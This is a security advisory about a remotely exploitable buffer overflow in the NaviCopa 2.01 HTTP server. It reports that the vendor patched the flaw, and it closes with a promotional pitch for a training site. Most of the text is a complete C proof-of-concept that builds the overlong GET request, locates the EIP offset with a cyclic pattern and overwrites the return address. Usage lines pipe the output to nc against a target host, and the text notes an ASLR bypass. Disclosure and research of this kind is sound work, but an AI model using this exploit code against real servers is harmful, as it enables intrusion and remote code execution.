Buffer Overflow in InterVetions' NaviCopa HTTP server 2.01

While developing one of our advanced security training modules, we
identified a remotely exploitable buffer overflow vulnerability in the
latest release of InterVetions' HTTP server NaviCopa 2.01. Successful
exploitation of this vulnerability allows an attacker to execute
arbitrary code in the context of the NaviCopa HTTP server. ....

The overflow can be triggered by sending a GET request in the following ways:

GET /cgi-bin/AAAAAAAAAAAAA....
or
GET /cgi/AAAAAAAAAAAAAAAAAA...

The number of characters that must be submitted depends on the length of
the path to the NaviCopa installation folder. By default (Windows, English
version) it resides in the Program Files/NaviCOPA directory; in that case
EIP is overwritten by characters 271 to 274 of the submitted string, so a
longer or shorter installation path shifts that offset. An exploit for this
vulnerability has been developed and successfully tested against Windows
2000 Advanced Server, Windows XP SP2 and Windows Vista. Not surprisingly,
ASLR (Address Space Layout Randomization) on Vista does not prevent
reliable code execution: it only randomizes images that were linked with
ASLR support (/DYNAMICBASE), so a return address can be taken from any
module that is still loaded at a fixed address.
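The trigger above, as an added example written for this page (not the advisory's or skillTube's exploit): a small C tool that builds the overlong GET request and locates the EIP offset. It assumes that the advisory's "characters 271 to 274" are 1-based positions counted from the first byte after `/cgi-bin/`, that the request line is completed with ` HTTP/1.0\r\n\r\n` (the advisory shows only the path), that the target is an x86 little-endian host, and that the return address `0xdeadbeef` is a placeholder to be replaced with a real address from a non-ASLR module. The pattern routine is the familiar Metasploit-style cyclic pattern, reimplemented here.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EIP_OFFSET 271   /* 1-based position reported for the default install path */

static const char REQ_PREFIX[] = "GET /cgi-bin/";      /* path from the advisory */
static const char REQ_SUFFIX[] = " HTTP/1.0\r\n\r\n";  /* assumed request terminator */

/* Cyclic pattern ("Aa0Aa1Aa2...") in which every 4-byte window is unique for
 * the first 20280 bytes, so the value that lands in EIP identifies its offset.
 * out must hold len + 1 bytes; returns the number of pattern bytes written. */
static size_t pattern_create(char *out, size_t len) {
    const char *upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *lower = "abcdefghijklmnopqrstuvwxyz";
    const char *digit = "0123456789";
    size_t pos = 0;
    for (int a = 0; a < 26 && pos < len; a++)
        for (int b = 0; b < 26 && pos < len; b++)
            for (int c = 0; c < 10 && pos < len; c++) {
                char chunk[3] = { upper[a], lower[b], digit[c] };
                for (int k = 0; k < 3 && pos < len; k++)
                    out[pos++] = chunk[k];
            }
    out[pos] = '\0';
    return pos;
}

/* Given the EIP value read from the debugger after the crash, return the
 * 1-based offset of those bytes inside the pattern, or -1 if not present.
 * The register is little-endian, so its low byte sat first in memory. */
static long pattern_offset(const char *pattern, size_t len, uint32_t eip) {
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff),         (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i + 1;
    return -1;
}

/* Build the trigger request: prefix + payload_len bytes + suffix. Bytes at
 * 1-based positions EIP_OFFSET..EIP_OFFSET+3 of the payload carry ret in
 * little-endian order; bytes before are 'A' filler, bytes after are 0xCC
 * (int3) so a debugger stops if execution ever reaches them. Returns the
 * total request length, or 0 if the buffer is too small. */
static size_t build_request(char *out, size_t outsz, size_t payload_len, uint32_t ret) {
    size_t plen = strlen(REQ_PREFIX), slen = strlen(REQ_SUFFIX);
    if (payload_len < EIP_OFFSET + 3 || plen + payload_len + slen + 1 > outsz)
        return 0;
    memcpy(out, REQ_PREFIX, plen);
    unsigned char *payload = (unsigned char *)out + plen;
    memset(payload, 'A', payload_len);
    payload[EIP_OFFSET - 1] = (unsigned char)(ret & 0xff);
    payload[EIP_OFFSET]     = (unsigned char)((ret >> 8) & 0xff);
    payload[EIP_OFFSET + 1] = (unsigned char)((ret >> 16) & 0xff);
    payload[EIP_OFFSET + 2] = (unsigned char)((ret >> 24) & 0xff);
    memset(payload + EIP_OFFSET + 3, 0xCC, payload_len - (EIP_OFFSET + 3));
    memcpy(out + plen + payload_len, REQ_SUFFIX, slen);
    out[plen + payload_len + slen] = '\0';
    return plen + payload_len + slen;
}

/* Usage:  ./poc pattern | nc host 80      (step 1: crash with the pattern)
 *         ./poc offset 0x41306a41         (step 2: EIP value -> offset)
 *         ./poc | nc host 80              (step 3: placeholder ret at 271) */
int main(int argc, char **argv) {
    char pattern[401], req[1024];
    if (argc > 1 && strcmp(argv[1], "pattern") == 0) {
        size_t n = pattern_create(pattern, 400);
        fputs(REQ_PREFIX, stdout); fwrite(pattern, 1, n, stdout); fputs(REQ_SUFFIX, stdout);
        return 0;
    }
    if (argc > 2 && strcmp(argv[1], "offset") == 0) {
        size_t n = pattern_create(pattern, 400);
        printf("%ld\n", pattern_offset(pattern, n, (uint32_t)strtoul(argv[2], NULL, 16)));
        return 0;
    }
    size_t len = build_request(req, sizeof req, 300, 0xdeadbeefUL);  /* placeholder ret */
    if (!len) return 1;
    fwrite(req, 1, len, stdout);
    return 0;
}
```

Port 80 in the usage comments is the HTTP default and an assumption; if an installation is moved out of Program Files/NaviCOPA, rerun steps 1 and 2 and adjust EIP_OFFSET rather than trusting 271.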

An exploit for the Metasploit Framework is available on our web site:

http://www.skilltube.com/index.php?option=com_content&task=blogsection&id=3&Itemid=37



Countermeasures:
The vendor was informed on March 23, 2007 and published a patched
version two hours later. Great response time!



*******************************************************
Partner program:
If you are interested in learning more about vulnerability research
and exploitation techniques, check out our advanced security training
modules on www.skillTube.com. Are you interested in becoming an author
for skillTube.com? Just get in contact with us.


